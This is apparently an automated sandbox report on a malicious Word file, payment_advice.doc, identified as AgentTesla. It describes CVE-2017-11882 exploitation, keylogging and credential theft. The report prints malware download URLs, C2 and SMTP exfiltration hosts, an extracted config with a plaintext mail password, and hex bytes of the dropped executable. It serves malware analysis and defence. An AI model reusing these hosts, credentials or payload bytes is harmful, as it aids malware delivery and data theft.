Analysis Report payment_advice.doc

Overview

General Information

Sample Name: payment_advice.doc
Analysis ID: 356799
MD5: 0ea6e37e930278b71774ae91d68bb879
SHA1: 5e3721c21b04c30c0f2d3b7e83b7bb506fd55cb8
SHA256: 3fda6eb4d90828826854806f1956d0d4a20bf5f95eb917370ff05ba5ba1dde66
Tags: doc
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Binary contains a suspicious time stamp
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://tunedinblog.com/wp-includes/twox.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: twox67345.exe.2952.9.memstr Malware Configuration Extractor: Agenttesla {"Username: ": "pEOdpd0kIi", "URL: ": "https://n2pGpXVLT5FR.net", "To: ": "", "ByHost: ": "mail.tpcdel.com:587", "Password: ": "ki7OGHHnlVdG04A", "From: ": ""}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Roaming\twox67345.exe ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe ReversingLabs: Detection: 37%
Multi AV Scanner detection for submitted file
Source: payment_advice.doc ReversingLabs: Detection: 43%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\twox67345.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe Joe Sandbox ML: detected

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\twox67345.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

barindex
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: nVisualBasic.pdb source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source: Binary string: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdbPe$ source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source: Binary string: ,micC:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.PDBe source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source: Binary string: nLC:\Windows\Microsoft.VisualBasic.pdb source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source: Binary string: oC:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.PDB, source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source: Binary string: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb3E96C492651E889CC13F1415EBB53FAC1131AE0BD333C5EE6021672D9718EA31A8AEBD0DA0072F25D87DBA6FC90FFD598ED4DA35E44C398C454307E8E33B8426143DAEC source: UGxXf.exe, 0000000B.00000002.2341228895.00000000054D1000.00000004.00000001.sdmp
Source: Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4UGxXf.PDB424491E3931}\Servererver32 source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source: Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: UGxXf.exe, 0000000B.00000002.2329868830.00000000006EA000.00000004.00000020.sdmp
Source: Binary string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: UGxXf.exe, 0000000B.00000002.2341228895.00000000054D1000.00000004.00000001.sdmp

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: tunedinblog.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 150.95.81.183:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 150.95.81.183:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.22:49165 -> 150.95.81.183:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://n2pGpXVLT5FR.net
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.35.120.75:587
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Feb 2021 15:53:54 GMTServer: Apache/2.2.31 (CentOS)Last-Modified: Tue, 23 Feb 2021 07:25:52 GMTETag: "211e7-99b78-5bbfbd40d5228"Accept-Ranges: bytesContent-Length: 629624Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b9 be 7d f2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 7c 09 00 00 06 00 00 00 00 00 00 2e 9b 09 00 00 20 00 00 00 a0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 02 00 00 8c 7e 0a 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 9a 09 00 57 00 00 00 00 a0 09 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 84 09 00 78 17 00 00 00 c0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 7b 09 00 00 20 00 00 00 7c 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 03 00 00 00 a0 09 00 00 04 00 00 00 7e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 09 00 00 02 00 00 00 82 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 9b 09 00 00 00 00 00 48 00 00 00 02 00 05 00 58 61 09 00 7c 39 00 00 03 00 02 00 04 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 22 02 28 17 00 00 0a 00 2a a6 73 18 00 00 0a 80 01 00 00 04 73 19 00 00 0a 80 02 00 00 04 73 0b 00 00 06 80 03 00 00 04 73 1a 00 00 0a 80 04 00 00 04 2a 42 02 28 17 00 00 0a 00 00 02 28 09 00 00 06 00 2a 00 00 1b 30 02 00 b6 00 00 00 06 00 00 11 00 72 58 01 00 70 fe 0e 01 00 72 5c 01 00 70 fe 0e 02 00 73 19 00 00 0a fe 0e 03 00 2b 06 fe 16 20 00 00 01 fe 0c 01 00 28 01 00 00 2b 6f 2c 00 00 0a fe 0e 04 00 38 38 00 00 00 fe 0d 04 00 28 2d 00 00 0a fe 0e 05 00 fe 0c 05 00 28 2e 00 00 0a fe 0c 02 00 28 13 00 00 0a da fe 0e 06 00 fe 0c 03 00 fe 0c 06 00 28 2f 00 00 0a 6f 25 00 00 0a 26 00 fe 0d 04 00 28 30 00 00 0a fe 0e 07 00 fe 0c 07 00 3a b2 ff ff ff dd 11 00 00 00 fe 0d 04 00 fe 16 05 00 00 1b 6f 27 00 00 0a 00 dc fe 0c 03 00 6f 31 00 00 0a fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 2a 00 00 01 10 00 00 02 00 24 00 6a 8e 00 11 00 00 00 00 1b 30 02 00 b6 00 00 00 06 00 00 11 00 72 68 01 00 70 fe 0e 01 00 72 7e 01 00 70 fe 0e 02
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic HTTP traffic detected: GET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic HTTP traffic detected: GET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1Host: coroloboxorozor.com
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 172.67.172.17 172.67.172.17
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.35.120.75:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /wp-includes/twox.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tunedinblog.comConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B08F3ED-537D-406E-B057-1B1541B1D39D}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /wp-includes/twox.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tunedinblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic HTTP traffic detected: GET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic HTTP traffic detected: GET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1Host: coroloboxorozor.com
Source: unknown DNS traffic detected: queries for: tunedinblog.com
Source: twox67345.exe, 00000009.00000002.2363471137.0000000005970000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: twox67345.exe, 00000004.00000002.2272663469.00000000022D1000.00000004.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2330351390.0000000002391000.00000004.00000001.sdmp String found in binary or memory: http://coroloboxorozor.com
Source: twox67345.exe, 00000004.00000002.2272663469.00000000022D1000.00000004.00000001.sdmp, twox67345.exe, 00000004.00000002.2272168458.00000000007BC000.00000004.00000020.sdmp, UGxXf.exe, 0000000B.00000002.2329693742.000000000069C000.00000004.00000020.sdmp, UGxXf.exe, 0000000B.00000002.2330351390.0000000002391000.00000004.00000001.sdmp String found in binary or memory: http://coroloboxorozor.com/base/4AE44766E50C275550C63C95498C19FE.html
Source: twox67345.exe, 00000004.00000002.2272663469.00000000022D1000.00000004.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2330351390.0000000002391000.00000004.00000001.sdmp String found in binary or memory: http://coroloboxorozor.com/base/C56E2AF17B6C065E85DB9FFDA54E4A78.html
Source: twox67345.exe, 00000009.00000002.2363471137.0000000005970000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: twox67345.exe, 00000009.00000002.2363471137.0000000005970000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: twox67345.exe, 00000009.00000002.2360313482.0000000002814000.00000004.00000001.sdmp String found in binary or memory: http://mail.tpcdel.com
Source: twox67345.exe, 00000009.00000002.2363471137.0000000005970000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: twox67345.exe, 00000004.00000002.2283901109.00000000059F0000.00000002.00000001.sdmp, twox67345.exe, 00000009.00000002.2363872886.0000000005DA0000.00000002.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2341353479.0000000005A80000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: twox67345.exe, 00000004.00000002.2272663469.00000000022D1000.00000004.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2330351390.0000000002391000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: twox67345.exe, 00000004.00000002.2283901109.00000000059F0000.00000002.00000001.sdmp, twox67345.exe, 00000009.00000002.2363872886.0000000005DA0000.00000002.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2341353479.0000000005A80000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: twox67345.exe, 00000009.00000002.2363471137.0000000005970000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: twox67345.exe, 00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmp String found in binary or memory: https://n2pGpXVLT5FR.net
Source: twox67345.exe, 00000009.00000002.2363471137.0000000005970000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Installs a global keyboard hook
Source: C:\Users\user\AppData\Roaming\twox67345.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\twox67345.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Jump to behavior
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\AppData\Roaming\twox67345.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary:

barindex
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\twox67345.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\twox67345.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 11_2_0679C010 NtSetInformationThread, 11_2_0679C010
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_00601A69 9_2_00601A69
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_00600048 9_2_00600048
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_00601788 9_2_00601788
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_0060408A 9_2_0060408A
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_00600115 9_2_00600115
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_006005B0 9_2_006005B0
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_0061B4B0 9_2_0061B4B0
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_00616898 9_2_00616898
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_00617128 9_2_00617128
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_0061C900 9_2_0061C900
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_0061D108 9_2_0061D108
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_006189BF 9_2_006189BF
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_00614A08 9_2_00614A08
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_00617467 9_2_00617467
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_0061342F 9_2_0061342F
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_0061908D 9_2_0061908D
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_0061812F 9_2_0061812F
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_00617118 9_2_00617118
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_0061F5E8 9_2_0061F5E8
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_0061A1C0 9_2_0061A1C0
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_0061A1B0 9_2_0061A1B0
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_0061F180 9_2_0061F180
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_0061764F 9_2_0061764F
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_006132E0 9_2_006132E0
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_00615ABE 9_2_00615ABE
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_0061AF28 9_2_0061AF28
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_0061FBF0 9_2_0061FBF0
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_0061B788 9_2_0061B788
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023F9630 9_2_023F9630
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023F5620 9_2_023F5620
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023F6A1E 9_2_023F6A1E
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023F4A08 9_2_023F4A08
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023F07A8 9_2_023F07A8
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023F0B80 9_2_023F0B80
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023F9828 9_2_023F9828
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023F78A5 9_2_023F78A5
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023F24D0 9_2_023F24D0
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023F1AEA 9_2_023F1AEA
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023F86D1 9_2_023F86D1
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023F1B61 9_2_023F1B61
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023F0798 9_2_023F0798
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023FCFF8 9_2_023FCFF8
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023F78A5 9_2_023F78A5
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023F9818 9_2_023F9818
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023F24C1 9_2_023F24C1
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023F856C 9_2_023F856C
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_023F4D50 9_2_023F4D50
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B30E00 16_2_00B30E00
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B31788 16_2_00B31788
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B31A69 16_2_00B31A69
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B30048 16_2_00B30048
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B305B0 16_2_00B305B0
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B30115 16_2_00B30115
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B30006 16_2_00B30006
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B31778 16_2_00B31778
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B4B4B0 16_2_00B4B4B0
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B46898 16_2_00B46898
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B4C900 16_2_00B4C900
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B4D108 16_2_00B4D108
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B46837 16_2_00B46837
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B4342F 16_2_00B4342F
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B4E828 16_2_00B4E828
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B47467 16_2_00B47467
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B4684E 16_2_00B4684E
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B479A0 16_2_00B479A0
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B4F5E8 16_2_00B4F5E8
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B4A1C0 16_2_00B4A1C0
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B4812F 16_2_00B4812F
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B4711A 16_2_00B4711A
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B432E0 16_2_00B432E0
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B4764F 16_2_00B4764F
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B4B788 16_2_00B4B788
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B4FBF0 16_2_00B4FBF0
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_00B4AF28 16_2_00B4AF28
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_048C24D0 16_2_048C24D0
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_048C9828 16_2_048C9828
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_048C914A 16_2_048C914A
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_048C4A08 16_2_048C4A08
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_048C6A18 16_2_048C6A18
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Code function: 16_2_048C5620 16_2_048C5620
